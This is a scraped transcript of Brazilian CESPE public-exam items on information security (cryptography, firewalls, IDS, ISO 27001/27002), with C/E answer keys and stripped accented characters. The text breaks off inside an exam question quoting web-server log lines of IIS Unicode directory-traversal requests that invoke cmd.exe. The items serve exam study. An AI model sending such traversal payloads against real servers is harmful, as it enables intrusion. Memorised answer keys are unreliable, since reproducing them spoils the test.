Questoes Concurso13122011 Comrespostas 120203044811 Phpapp01

16
7/14/2019 Questoes Concurso13122011 Comrespostas 120203044811 Phpapp01 http://slidepdf.com/reader/full/questoes-concurso13122011-comrespostas-120203044811-phpapp01 1/16 CESPE - TRIBUNAL DE CONTAS DA UNIÃO - CONCURSO PÚBLICO PARA PROVIMENTO DE CARGOS DE ANALISTA DE CONTROLE EXTERNO CARGO 2.4: ANALISTA DE CONTROLE EXTERNO  – ÁREA: APOIO TÉCNICO E ADMINISTRATIVO – ESPECIALIDADE: TECNOLOGIA DA INFORMAÇÃO Aplicaçâo: 3/8/2008 Na rede de computadores de uma organização pública brasileira com diversos ativos, como, por exemplo, switches, roteadores, firewalls, estações de trabalho, hosts servidores de aplicação web, servidores de bancos de dados, é comum a ocorrência de ataques e de outros incidentes que comprometem a segurança de seus sistemas. Nessa organização, a definição de políticas e metodologias adequadas para se lidar com esse tipo de problema cabe ao departamento de TI.  A partir da situação apresentada acima, julgue os itens de 167 a 180, relativos à segurança da informação. C 167 Se, na rede de computadores da organização citada, para garantir maior confidencialidade na troca de dados entre duas de suas máquinas, seus administradores empregarem a técnica conhecida como cifra de transposição para cifrar determinado conjunto de mensagens, então, nessas duas máquinas, devem ser utilizadas chaves simétricas. C 168 Caso a rede de computadores dessa organização utilize o algoritmo DES (data encryption standard) e os administradores dessa rede decidam empregar a técnica conhecida como whitening, com o objetivo de reduzir as vulnerabilidades de um dos sistemas criptográficos empregados na rede, haverá um acréscimo de bits à chave criptográfica original, reduzindo as chances de sucesso de uma eventual criptoanálise desse sistema. 169 Se, para a troca de mensagens seguras na rede de computadores da organização citada, seus vários dispositivos móveis empregarem sistemas baseados no algoritmo criptográfico 3DES (DES triplo) e os vários dispositivos não-móveis utilizarem sistemas baseados no algoritmo simples DES, a superação da diferença entre os algoritmos criptográficos empregados pelos sistemas de troca de mensagens seguras usados por dispositivos móveis e não-móveis dessa rede pode ser feita pelo administrador por meio da definição K1 = K2 = K3 = K, em que K1, K2 e K3 são as três chaves usadas no 3DES e K é a chave usada no simples DES e compartilhada entre dois dispositivos quaisquer das duas categorias mencionadas. 170 Caso os computadores da rede da organização em apreço, empregando sistemas baseados no algoritmo RSA, troquem mensagens com computadores localizados na Internet, é correto afirmar que a segurança obtida baseia-se na premissa de que é atualmente difícil fatorar números grandes e de que a criptografia empregada suporta as características de não-repúdio e autenticidade de pelo menos uma das partes da comunicação. 171  Caso ocorra, na comunicação entre os computadores da rede da organização mencionada, o problema conhecido como man-in-the-middle attack, uma solução eficaz será utilizar uma autoridade de certificação, que provê alto grau de confiança durante o processo de distribuição de chaves públicas. 172  Se, com o fim de permitir a assinatura de certificados digitais e de mensagens trocadas entre seus computadores e computadores de redes abertas, o administrador da rede tiver implementado o uso de sistemas criptográficos baseados no algoritmo message-digest 5 (MD5), nesse caso, a partir do instante em que esse sistema entra em uso efetivo, todos os certificados e mensagens digitalmente assinados e em que foi empregado o MD5 passam a gerar sumários de mensagens com tamanho de 160 bits; além disso, o uso desse sistema aumenta a garantia de integridade das comunicações, quando comparado a sistemas que não possibilitam assinatura digital.

Transcript of Questoes Concurso13122011 Comrespostas 120203044811 Phpapp01

CESPE - TRIBUNAL DE CONTAS DA UNIO - CONCURSO PBLICO PARA PROVIMENTO DE CARGOS DE ANALISTA DE CONTROLE EXTERNOCARGO 2.4: ANALISTA DE CONTROLE EXTERNO REA: APOIO TCNICO E ADMINISTRATIVO ESPECIALIDADE: TECNOLOGIA DA INFORMAOAplicao: 3/8/2008

Na rede de computadores de uma organizao pblica brasileira com diversos ativos, como, por exemplo, switches, roteadores, firewalls, estaes de trabalho, hosts servidores de aplicao web, servidores de bancos de dados, comum a ocorrncia de ataques e de outros incidentes que comprometem a segurana de seus sistemas. Nessa organizao, a definio de polticas e metodologias adequadas para se lidar com esse tipo de problema cabe ao departamento de TI. A partir da situao apresentada acima, julgue os itens de 167 a 180, relativos segurana da informao.C 167 Se, na rede de computadores da organizao citada, para garantir maior confidencialidade na troca de dados entre duas de suas mquinas, seus administradores empregarem a tcnica conhecida como cifra de transposio para cifrar determinado conjunto de mensagens, ento, nessas duas mquinas, devem ser utilizadas chaves simtricas.C 168 Caso a rede de computadores dessa organizao utilize o algoritmo DES (data encryption standard) e os administradores dessa rede decidam empregar a tcnica conhecida como whitening, com o objetivo de reduzir as vulnerabilidades de um dos sistemas criptogrficos empregados na rede, haver um acrscimo de bits chave criptogrfica original, reduzindo as chances de sucesso de uma eventual criptoanlise desse sistema.E 169 Se, para a troca de mensagens seguras na rede de computadores da organizao citada, seus vrios dispositivos mveis empregarem sistemas baseados no algoritmo criptogrfico 3DES (DES triplo) e os vrios dispositivos no-mveis utilizarem sistemas baseados no algoritmo simples DES, a superao da diferena entre os algoritmos criptogrficos empregados pelos sistemas de troca de mensagens seguras usados por dispositivos mveis e no-mveis dessa rede pode ser feita pelo administrador por meio da definio K1 = K2 = K3 = K, em que K1, K2 e K3 so as trs chaves usadas no 3DES e K a chave usada no simples DES e compartilhada entre dois dispositivos quaisquer das duas categorias mencionadas.C 170 Caso os computadores da rede da organizao em apreo, empregando sistemas baseados no algoritmo RSA, troquem mensagens com computadores localizados na Internet, correto afirmar que a segurana obtida baseia-se na premissa de que atualmente difcil fatorar nmeros grandes e de que a criptografia empregada suporta as caractersticas de no-repdio e autenticidade de pelo menos uma das partes da comunicao.C 171 Caso ocorra, na comunicao entre os computadores da rede da organizao mencionada, o problema conhecido como man-in-the-middle attack, uma soluo eficaz ser utilizar uma autoridade de certificao, que prov alto grau de confiana durante o processo de distribuio de chaves pblicas.E 172 Se, com o fim de permitir a assinatura de certificados digitais e de mensagens trocadas entre seus computadores e computadores de redes abertas, o administrador da rede tiver implementado o uso de sistemas criptogrficos baseados no algoritmo message-digest 5 (MD5), nesse caso, a partir do instante em que esse sistema entra em uso efetivo, todos os certificados e mensagens digitalmente assinados e em que foi empregado o MD5 passam a gerar sumrios de mensagens com tamanho de 160 bits; alm disso, o uso desse sistema aumenta a garantia de integridade das comunicaes, quando comparado a sistemas que no possibilitam assinatura digital.E 173 Se a rede de uma organizao atuar de forma integrada a uma infra-estrutura de chave pblica, de natureza hierrquica, formada por RAs (regional authorities) e CAs (certification authorities), o administrador da rede, ao analisar qual foi a entidade que assinou digitalmente o certificado pblico de cada membro dessa infra-estrutura de chave pblica, constatar que todos os certificados analisados foram assinados pela autoridade certificadora raiz.C 174 Em caso de ataques do tipo e-mail spoofing aos usurios da rede, recomenda-se que o administrador da rede adote o uso de certificados do tipo X.509, o qual permitir aos destinatrios identificarem corretamente os e-mails recebidos.E 175 Para confirmar a suspeita de que a indisponibilidade apresentada por um host da rede de computadores de uma organizao est sendo causada por um ataque do tipo smurf, o administrador dever verificar se h um grande nmero de pacotes ICMP (Internet control message protocol) do tipo request originados de vrios computadores pertencentes a uma mesma rede e direcionados a este host.C 176 Considere que um dos hosts da rede de uma organizao esteja sofrendo um ataque da classe de negao de servio (denial of service DoS) e que, visando identificar de forma mais precisa o ataque que o host est sofrendo, o administrador tenha constatado que h elevada razo entre o nmero de pacotes TCP do tipo SYN e o nmero de pacotes TCP do tipo ACK que esto sendo enviados para o host sob ataque e que, por outro lado, a razo entre o nmero de pacotes TCP do tipo SYN recebidos pelo host e o nmero de pacotes do tipo SYN/ACK enviados pelo host aproximadamente igual a 1. Nessa situao, o administrador dever considerar a possibilidade de o ataque sob anlise ser do tipo SYN flood, visto que so reduzidas as chances de o ataque ser do tipo NAK/ACK.C 177 Se houver suspeita de que um dos sistemas web da rede de uma organizao est sob ataque do tipo SQL injection, recomendada ao administrador do sistema web a ofuscao de nomes das tabelas e dos campos do SGBD usados por esse sistema, o que pode reduzir as chances de que tal ataque seja bem-sucedido. O simples aumento da segurana no acesso ao host em que se encontra o SGBD no far que os dados armazenados no banco de dados deixem de ser expostos a consultas indevidas decorrentes de ataques do tipo SQL injection.E 178 No caso de o administrador implementar, na ligao da rede Internet, um firewall do tipo nvel de rede, para permitir o funcionamento correto de um servidor DNS no interior de sua rede, ser necessrio liberar, no firewall, apenas o acesso externo do servidor DNS porta 53.E 179Se um administrador implementar, na ligao da rede de computadores Internet, um statefull firewall, as regras de funcionamento que esto implementadas no interior desse firewall atuaro quase que exclusivamente na camada 4 e, eventualmente, na camada 7 do modelo OSI.C 180 Se o administrador da rede de computadores tiver de escolher entre implantar um proxy firewall ou um firewall do tipo packet filter, a sua deciso dever basear-se em um dos dois critrios seguintes: necessidade de atuao na camada de aplicao ou maior vazo de dados. Se o critrio preponderante for o primeiro, ento, a deciso deve ser favorvel instalao de proxy firewalls; se for o segundo, deve ser escolhido um packet filter.PODER JUDICIRIOSUPERIOR TRIBUNAL DE JUSTIACONCURSO PBLICO PARA FORMAO DE CADASTRO DE RESERVANOS CARGOS DE ANALISTA JUDICIRIO E DE TCNICO JUDICIRIO

CARGO 2: ANALISTA JUDICIRIO REA: APOIO ESPECIALIZADO ESPECIALIDADE: INFORMTICA

Com respeito a vulnerabilidades e ataques a sistemas computacionais, julgue os itens que se seguem.C 106 A tcnica denominada SQL injection tem por objetivo o acesso a bancos de dados por meio de aplicaes web. Ataques embasados nessa tcnica podem ser evitados por checagem de dados de entrada no backend e frontend da aplicao.C 107 Ataques denominados buffer overflows, tanto na heap quanto na stack, levam execuo arbitrria de cdigo, podendo ser evitados pela retirada de privilgios de execuo e pela checagem de integridade das estruturas citadas.E 108 Em geral, firewalls com inspeo de estado evitam ataques do tipo buffer overflow.C 109 Em redes IP que utilizam switches, pode-se realizar a escuta do trfego com o ARP spoofing.E 110 O WEP do padro 802.11 o protocolo atualmente considerado seguro para se garantir o sigilo dos dados que trafegam na rede.Com relao aos sistemas criptogrficos, julgue os itens subseqentes.

E 111 O sistema RSA seguro contra ataques adaptativos de texto cifrado escolhido.C 112 O esquema OAEP apresenta segurana demonstrvel no caso em que utiliza o RSA, devido s propriedades deste ltimo.C 113 Os sistemas de criptografia simtrica utilizam apenas uma chave, que usada tanto para cifrao quanto para decifrao.E 114 Do ponto de vista do custo computacional, os sistemas assimtricos apresentam melhor desempenho que os sistemas simtricos.C 115 Os sistemas de criptografia assimtrica utilizam duas chaves: uma pblica, que usada para cifrao; e uma privada, que usada para decifrao.CESPE - SUPERIOR TRIBUNAL DE JUSTIAAplicao: 9/5/2004Por meio da padronizao de protocolos, o TCP/IP permite que sistemas operacionais distintos se comuniquem. Com relao comunicao de sistemas operacionais distintos por meio do TCP/IP, julgue os itens que se seguem.

C 66 O sistema SAMBA, encontrado no Linux, permite que seja emulado um servidor de domnio Windows NT em redes TCP/IP. Mediante esse processo, estaes Windows podem ser autenticadas em um servidor Linux que esteja executando o SAMBA.C 67 O secure shell (SSH) permite que uma estao Windows se conecte remotamente a uma estao Unix que lhe fornea um SHELL remoto por meio de mecanismos de criptografia assimtrica, com o uso de um cliente SSH. O SSH possui duas verses bsicas do protocolo (1 e 2) e porta padro TCP 22.Vrias tcnicas so empregadas para a descoberta de vulnerabilidades em sistemas computacionais. Uma das mais utilizadas para o comeo de um ataque de vulnerabilidades a varredura de portas. Acerca de tcnicas de varredura de portas, julgue os itens que se seguem.

E 121 Na tcnica TCP SYN scanning, feita uma conexo TCP completa.C 122 Na tcnica TCP FIN scanning, portas abertas no respondem ao pacote FIN com a resposta RST correta.E 123 Na tcnica de fragmentation scanning, normalmente um atacante gera os pacotes IP de forma fragmentada. Isso torna mais fcil sua deteco com o uso de filtros, uma vez que necessrio que o primeiro fragmento chegue ao destino.Acerca de criptografia, uma das tcnicas fundamentais para a segurana da informao, de protocolos criptogrficos e de sistemas de criptografia e aplicaes, julgue os itens subseqentes.

E 124 O modo de operao cipher block chain (CBC) pode ser aplicado maioria dos algoritmos de criptografia. Na sua utilizao como algoritmo data encryption standard (DES), o modo CBC impede que um atacante substitua um bloco cifrado sem ser descoberto. Entretanto, o modo CBC do DES apresenta o inconveniente de permitir que um erro em um bloco cifrado afete a decifrao de todos os demais blocos.C 125 Um protocolo de assinatura digital deve apresentar como propriedades bsicas a impossibilidade de fabricao de assinaturas por terceiros e a garantia da autenticidade de determinada assinatura. Alm disso, deve garantir que uma transao com assinatura digital seja inaltervel e no possa ser reutilizada em outra ocasio.C 126 Um dos fatores que complicam o emprego de sistemas de criptografia simtricos com chave privada nica a necessidade de distribuir e armazenar N x (N 1) / 2 chaves, caso haja um canal criptogrfico prprio para cada par de usurios em um conjunto de N usurios.Em relao a caractersticas de firewalls, julgue os itens a seguir.

C 127 Um firewall StateFull permite o controle de uma conexo TCP/IP por meio de estado interno, de forma que os pacotes no so tratados independentemente, mas sim em um contexto de uma conexo.C 128 Firewalls do tipo brigdes trabalham na camada de enlace. Sua deteco muito difcil porque funcionam de forma transparente para os usurios fim-a-fim.CESPE - DEPARTAMENTO DE POLCIA FEDERALAplicao: 9 e 10/10/2004A poltica de segurana um conjunto de diretrizes, normas, procedimentos e instrues de trabalho que estabelecem os critrios de segurana para serem adotados no nvel local ou a institucional, visando o estabelecimento, a padronizao e a normalizao da segurana tanto no mbito humano quanto tecnolgico. Acerca das boas prticas para elaborao, implantao e monitorao da poltica de segurana, julgue os itens seguintes.

E 93 A elaborao de uma poltica de segurana institucional deve refletir, sobretudo, o know-how de segurana dos profissionais envolvidos com a sua elaborao e no a cultura da organizao.E 94 A poltica de segurana no deve ter carter punitivo, mas conscientizador e participativo. Assim, na poltica de segurana no se definem sanes ou penalidades aplicveis em caso de descumprimento das normas. Ao contrrio, definem-se responsabilidades e o impacto do no cumprimento adequado do papel de cada um na gesto da segurana como um todo.C 95 A poltica precisa ser aprovada pela administrao da organizao e formalmente comunicada a todos que devem cumpri-la, caso contrrio sua aplicao torna-se de difcil controle e aceitao.C 96 Uma fonte primria para a definio dos requisitos de segurana consiste na avaliao de riscos dos ativos de informao. Essa anlise permite ainda equilibrar os gastos com os controles de segurana de acordo com os danos causados aos negcios gerados pelas potenciais falhas na segurana.Os sistemas de informao possuem diversas vulnerabilidades que podem ser exploradas para se comprometer a segurana da informao. Para reduzir os riscos de segurana, empregam-se diversos mecanismos de controle e de proteo fsica e lgica desses sistemas. Acerca dasvulnerabilidades e protees dos sistemas de informao, julgue os itens a seguir.E 97 Os programas conhecidos como spyware so um tipo de trojan que tem por objetivo coletar informaes acerca das atividades de um sistema ou dos seus usurios e representam uma ameaa confidencialidade das informaes acessadas no sistema infectado. Esses programas no so considerados como vrus de computador, desde que no se repliquem a partir de um sistema onde tenham sido instalados.E 98 Um ataque de scanner consiste na monitorao de servios e verses de software que esto sendo executados em um determinado sistema. Um sistema firewall que implementa um filtro de conexes capaz de anular os efeitos desse tipo de ataque. E 99 A captura de pacotes que trafegam na rede com uso de um sniffer um exemplo de ataque para o qual no h nenhuma forma de deteco possvel pelo administrador de rede.E 100 Um ataque de buffer overflow consiste em desviar o fluxo de execuo de um software para um programa arbitrrio que esteja copiado no disco rgido do sistema atacado. Esse um exemplo clssico de backdoor resultante de um defeito de programao, que s pode ser eliminado com a atualizao de verso do software defeituoso.E 101 Firewall e proxy so sinnimos para descrever equipamentos que realizam conexes de rede externas para nodos que no estejam conectados diretamente Internet.E 102 Um sistema de deteco de intruso (IDS) por uso incorreto utiliza descries de ataques previamente conhecidos (assinaturas) para identificar a ocorrncia de ataques. Esse tipo de IDS tem como inconveniente a gerao de um nmero elevado de falsos positivos quando ataques novos, para os quais ainda no foram especificadas assinaturas de ataque convenientes, so lanados contra o sistema monitorado pelo IDS.A criptografia moderna tem trs tipos de ferramentas bsicas: algoritmos criptogrficos simtricos e assimtricos e as funes de resumo de mensagem. Acerca dos principais algoritmos para esses tipos de ferramenta criptogrfica, julgue os itens subseqentes.

E 103 Cada uma das chaves pblica e privada de um criptossistema RSA so formadas por dois nmeros inteiros denominados expoente e mdulo, ambos devendo ser nmeros primos.C 104 O algoritmo criptogrfico DES uma cifra de substituio que mapeia um bloco de texto claro de 64 bits em um outro bloco de criptograma de 64 bits.E 105 O DES e o seu sucessor como padro de criptografia do governo norte-americano, o AES, so cifradores de bloco que obedecem o esquema geral de cifradores de Feistel. Nesses cifradores, os blocos cifrados so divididos em metades (lado esquerdo e lado direito) de mesmo tamanho, que so processadas independentemente, a cada rodada de cifrao. Esse processo faz que apenas metade dos bits do bloco cifrado sofra influncia da chave, em cada rodada, introduzindo confuso no processo criptogrfico.E 106 MD5 e SHA-1 so funes de resumo de mensagem (funes hash). Esses algoritmos tm a finalidade de garantir a integridade e a autenticidade para mensagens de tamanho arbitrrio.C 107 O algoritmo criptogrfico RC4 tem como princpio de funcionamento o segredo criptogrfico perfeito, em que a chave criptogrfica deve ter o mesmo tamanho que a mensagem. Desse modo, no RC4, a chave de criptografia a semente de uma seqncia pseudo-aleatria que usada para chavear os bytes cifrados em uma operao linear. A mensagem cifrada pode ser to longa quanto o perodo da seqncia gerada.As aplicaes web que necessitam de segurana criptogrfica dos dados transmitidos entre o navegador (cliente) e o servidor web utilizam o protocolo SSL/TLS para o estabelecimento de sesses seguras. Acerca do SSL/TLS e suas aplicaes, julgue os itens a seguir.

E 108 Para o estabelecimento de uma sesso SSL, necessrio que o servidor e o cliente tenham um certificado digital vlido. Esses certificados devem ser trocados e reconhecidos pelos destinatrios como certificados confiveis.C 109 O reconhecimento da confiana em um certificado digital pode ser feito por delegao, com uso de terceiras partes mutuamente confiveis, denominadas autoridades certificadoras.E 110 Certificados digitais so assinados com criptografia assimtrica. A mesma chave usada para assinar o certificado deve ser usada para assinar as requisies de chave de sesso, o que garante a autenticidade e o no-repdio no estabelecimento da sesso e serve como comprovao da propriedade do certificado.C 111 Durante a fase de transmisso de dados, os dados so cifrados com criptografia simtrica.E 112 Para se definir os algoritmos de criptografia simtrica que sero usados em uma sesso SSL, cliente e servidor trocam uma mensagem informando qual a sute de algoritmos que cada um suporta. Cabe ao servidor a escolha do algoritmo que ser usado, tendo como critrio o algoritmo que suporte a maior chave simtrica, em nmero de bits.

CESPE, ANATEL, 08/03/09, cargo 16-caderno ALFACom o desenvolvimento da Internet e a migrao de um grande nmero de sistemas especializados de informao de grandes organizaes para sistemas de propsito geral acessveis universalmente, surgiu a preocupao com a segurana das informaes no ambiente da Internet. Acerca da segurana e da tecnologia da informao, julgue os itens a seguir. E 27 Em uma organizao, a segurana da informao responsabilidade corporativa do gerente e deve ser mantida no mbito particular desse gerente.E 28 A disponibilidade e a integridade so itens que caracterizam a segurana da informao. A primeira representa a garantia de que usurios autorizados tenham acesso a informaes e ativos associados quando necessrio, e a segunda corresponde garantia de que sistemas de informaes sejam acessveis apenas queles autorizados a acess-los.

CESPE, ANATEL, 08/03/09, cargos: de 1 a 6 e de 11 a 15, Parte I-Nvel Superior, Conhecimentos BsicosAcerca da segurana da informao, julgue os itens a seguir.C 29 Segurana da Informao a proteo contra um grande nmero de ameaas s informaes, de forma a assegurar a continuidade dos negcios, minimizando danos comerciais e maximizando o retorno de investimentos. Ela pode ser garantida fazendo-se uso de controles fsicos da informao, de mecanismos de controle de acesso, como firewalls e proxies, entre outras medidas. E 30 Uma organizao, ao estabelecer seus requisitos de segurana da informao, deve avaliar riscos, a partir da vulnerabilidade e da probabilidade de ocorrncia de eventos de ameaa, sempre obtidas por meio de dados histricos de incidentes e problemas registrados nos bancos de dados da central de servios.

CESPE, MCT/FINEP, 2009, Cargo 1635 Determinada organizao, aps a realizao de cpia de segurana dos dados do servidor de compartilhamento de arquivo da empresa, na qual existiam projetos importantes, contratou uma transportadora para levar as fitas a um banco, onde seriam guardadas em cofre forte. Durante o trajeto, a transportadora perdeu as fitas e, dias depois, os principais projetos da empresa em questo foram divulgados por concorrentes. Considerando a situao hipottica acima, correto afirmar que, para proteger os dados do backup, poderia ter sido utilizada a tcnica:

A de estenografia.B de criptografia.C label switching.D IPSec.E RAID 5.

CESPE, MCT/FINEP, 2009, Cargo 1643 Existem pragas virtuais (malwares) que so utilizadas na Internet com inteno de controlar um computador remotamente sem que o usurio perceba. Esses malwares so dos mais variados tipos e utilizam diversas tcnicas. Uma tcnica de comunicao utilizada por determinados malwares para receber ordens de ataques ou de envio de spam a

A RSS.B CSS.C IRC.D TIF.E HAL.

CESPE, TCU, auditor federal de controle externo, cargo 3

A figura acima apresenta um modelo para segurana de rede, no qual se destacam vrios elementos, individualmente nomeados. Esse modelo apresenta um conjunto de elementos que compem solues para o provimento de um canal de informao seguro entre o emissor (E) e o (D) destinatrio, envolvendo um terceiro confivel (TC). Julgue os itens de 161 a 163, acerca das informaes apresentadas e dos conceitos de ataques e dispositivos de segurana de redes de computadores e criptografia.C 161 Quando do uso de criptografia simtrica, as transformaes relacionadas segurana, realizadas nos lados do emissor (E) e do destinatrio (D), devem ser efetuadas com o uso de uma informao secreta denominada chave. Essa chave pode ser permanente ou transitria, conforme o desenho dos algoritmos e protocolos de criptografia empregados. No caso do protocolo https, por exemplo, empregam-se, entre outros aspectos, dois tipos de chaves: chaves criptogrficas simtricas e transitrias, bem como chaves assimtricas permanentes. Adicionalmente, chaves de ambos os tipos podem ser geradas no lado do emissor (E) ou do destinatrio (D) da mensagem, bem como so trocadas com o outro lado por meio de um canal de confiana estabelecido com um terceiro confivel (TC), que comum ao emissor e ao destinatrio.C 162 Considere a seguinte situao hipottica. Um analista foi incumbido de construir um sistema de comunicaes seguro baseado em uma combinao de cifragem simtrica e esteganografia no qual as mensagens trocadas entre o emissor (E) e o destinatrio (D) sejam sempre de pequeno tamanho e que apenas uma pequena quantidade de mensagens seja eventualmente trocada durante todo o ciclo de vida do sistema. De acordo com os critrios de segurana do sistema, dever ser provida absoluta confidencialidade do teor das mensagens, em detrimento de integridade e disponibilidade. Para tal tarefa, o implementador dispe de um gerador de nmeros aleatrios de elevadssima qualidade, mas precisa fazer uma implementao de grande simplicidade. Esses critrios e o desenho do sistema de cifragem no so conhecidos pelo oponente (O). Nessa situao, mais adequado que o implementador do sistema adote um modelo com base na tcnica de one-time pad, que utiliza uma cifra de fluxo, em vez de um modelo baseado no algoritmo DES (data encription standard), que utiliza cifra de bloco.C 163 Considerando que o modelo mostrado na figura seja empregado na arquitetura de um servio de controle de acesso baseado no Kerberos, em que existe um domnio de rede que contm um servidor Kerberos, vrios servidores de recursos destinatrios (D) e vrios clientes de recursos emissores (E), correto afirmar que: o servidor Kerberos precisa conhecer senhas de autenticao dos clientes; o servidor Kerberos precisa compartilhar chaves criptogrficas simtricas com cada servidor de recursos (D); para obter bilhetes de acesso a cada servidor de recursos (D) individual do domnio de rede, o cliente de recursos (E) precisa dialogar com o servidor Kerberos.

Durante resposta a um incidente de segurana em um ambiente de rede de computadores, um analista de segurana de tecnologia da informao (TI) precisou empregar vrias tcnicas e ferramentas para realizar coleta de dados em vrios hosts e dispositivos de rede, relativas possvel presena de malwares. Algumas das tcnicas e das ferramentas e alguns dos dados coletados foram os seguintes:I portas TCP/IP abertas nos computadores da rede, por meio da execuo de varredura;II relatos de deteco de infeces por vrus, por meio de antivrus;III log de aplicaes das regras no firewall da rede, por meio de inspeo;IV nomes e assinaturas dos processos computacionais em execuo em um computador em determinado espao de tempo, por meio de software apropriado.

Considerando essa situao hipottica, se a comparao que o analista de segurana realizar com a ltima linha de base segura de determinado computador indicar que:E 164 ocorreu um aumento na quantidade e qualidade de registros relativos aos aspectos I e III da linha base, mas no ao aspecto IV, ento isso sugerir a presena de worms e backdoors na rede.C 165 no h alteraes junto a nenhum dos fatores I, II, III e IV, ento isso evidenciar que no h infeco por malwares.

Acerca dos processos tpicos de tratamento de incidentes de segurana, julgue o item abaixo.

E 168 A alta gesto da organizao em escopo exerce maior influncia sobre o ponto de deciso 1 que sobre o ponto de deciso 2, bem como contribui ativamente para prover informaes quanto s fases de identificao de riscos, de definio do contexto e de anlise crtica de riscos.

A respeito do diagrama acima, que apresenta um modelo conceitual sistmico da norma ABNT NBR ISO/IEC 27001, julgue os itens 169 e 170.C 169 No modelo em apreo, o subsistema de planejamento do SGSI possui sobreposio de atividades com a fase de definio do contexto presente na norma ABNT NBR ISO/IEC 27005 bem como produz uma informao de sada similar quela produzida durante o processo de aceitao do risco da mesma ABNT NBR ISO/IEC 27005.C 170 Entre os documentos e registros cujo controle demandado pela norma ABNT NBR ISO/IEC 27001, destacam-se como documentos a declarao da poltica de segurana, o relatrio de anlise/avaliao de risco e a declarao de aplicabilidade; alm disso, destacam-se como registros os livros de visitantes, os relatrios de auditoria, as ocorrncias de incidentes de segurana e outros registros, inclusive de no conformidade.

O modelo da figura acima apresenta elementos individualmente nomeados e presentes em uma rede hipottica, acerca dos quais possvel inferir caractersticas de protocolos de segurana. Julgue os itens seguintes, acerca das informaes apresentadas e de dispositivos de segurana de redes de computadores.C 171 Se os Endhosts A e B trocarem vrios pacotes por meio de seus respectivos gateways, ento no haver modo fcil de o host C identificar quais dos pacotes IP trafegados entre os gateways A e B so relativos comunicao entre os Endhosts A e B.E 172 Considerando a necessidade de instalar um IDS para proteger a rede A, algumas opes podem ser adotadas, entre elas a de usar um sistema passivo ou ativo, bem como a de usar um sistema baseado em host ou em rede. Se a soluo for adotar um sistema passivo e com base em host, ento o host C poder ser uma mquina adequada para essa necessidade. Se a soluo for adotar um sistema reativo e embasado na rede, ento podem-se usar os gateways A ou B. Se a soluo for adotar um sistema reativo e baseado em host, ento se poder usar o host C.

Quanto a conceitos de controle de acesso e segurana de ambientes fsicos e lgicos e s informaes contidas na figura acima, que apresenta um modelo arquitetural da plataforma de verificao de identidade pessoal PIV, proposta pelo rgo de padronizao norte-americano NIST, julgue os itens a seguir.C 175 A plataforma apresentada na figura suporta identificao por mltiplos fatores; contempla atribuies de autoridades de registro em modelo de infraestrutura de chaves pblicas; no apresenta incompatibilidade com o uso de listas de certificados revogados (CRLs).C 176 No h como determinar se o modelo dessa figura emprega controle de acesso discricionrio ou mandatrio ou ambos.

A lista abaixo apresenta os ttulos das sees da norma ABNT NBR ISO/IEC 27002 (17799), que contm um guia das melhores prticas em gesto da segurana da informao. Tais sees possuem correspondente registro no anexo A da norma ABNT NBR ISO/IEC 27001, definindo grupos de objetivos de controles e controles de segurana que podem ser implementados.5Poltica de Segurana6Organizando a Segurana da Informao7Gesto de Ativos8Segurana em Recursos Humanos9Segurana Fsica e do Ambiente10Gerenciamento das Operaes e Comunicaes11Controle de Acessos12Aquisio, Desenvolvimento e Manuteno de Sistemas de Informao13Gesto de Incidentes de Segurana da Informao14Gesto da Continuidade do Negcio15Conformidade

Nos itens de 177 a 180, julgue as propostas de associao entre conceitos ou prticas de segurana e as sees da norma ABNT NBR ISO/IEC 27002.C 177 O emprego de um ambiente computacional dedicado isolado, bem como a blindagem eletromagntica e o levantamento dos ativos envolvidos em processos crticos so abordagens diretamente associadas ao Controle de Acessos, Segurana Fsica e do Ambiente e Gesto da Continuidade do Negcio, respectivamente.E 178 Os profissionais de segurana que realizam anlise crtica de logs e controle de vulnerabilidades tcnicas relacionam-se mais fortemente com os aspectos de Organizao da Segurana da Informao, que com a Aquisio, Desenvolvimento e Manuteno de Sistemas de Informao.C 179 A configurao de protees de tela bloqueadas por senha e o uso de firewalls e sistemas de deteco de intrusos so aes apenas indiretamente ligadas gesto de Incidentes de Segurana da Informao e Conformidade, respectivamente.E 180 A proteo de registros organizacionais, entre eles o registro de visitantes, constitui uma prtica diretamente associada Segurana Fsica e do Ambiente, embora, no caso especfico do registro de visitantes, esteja prescrita visando o alcance da Segurana em Recursos Humanos.

Os trechos abaixo foram retirados de um arquivo de log referente a acessos a um servidor http.

atacker1.nowhere.com - - [01/Nov/2000:18:20:49 +0000] "GET/scripts/..%C0%AF../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 404 306atacker2.nowhere.com - - [11/Jan/2001:09:24:05 +0000] "GET/scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20dir HTTP/1.1" 404 344atacker2.nowhere.com - - [11/Jan/2001:09:24:05 +0000] "GET/iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20dir HTTP/1.1" 404 346atacker2.nowhere.com - - [11/Jan/2001:09:24:06 +0000] "GET/msadc/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20dir HTTP/1.1" 404 342atacker2.nowhere.com - - [11/Jan/2001:09:24:06 +0000] "GET /cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20dir HTTP/1.1" 404 344atacker2.nowhere.com - - [11/Jan/2001:09:24:06 +0000] "GET/_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20dir HTTP/1.1" 404 345atacker2.nowhere.com - - [11/Jan/2001:09:24:06 +0000] "GET/wwwroot/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20dir HTTP/1.1" 404 344atacker3.nowhere.com - - [19/Jan/2001:08:18:37 -0200] "GET/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.0" 404 461atacker3.nowhere.com - - [19/Jan/2001:08:18:37 -0200] "GET/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.0" 404 461atacker4.nowhere.com - - [22/Jan/2001:21:19:27 -0200] "GET/IISADMPWD/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af...%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 200 607atacker4.nowhere.com - - [22/Jan/2001:21:19:49 -0200] 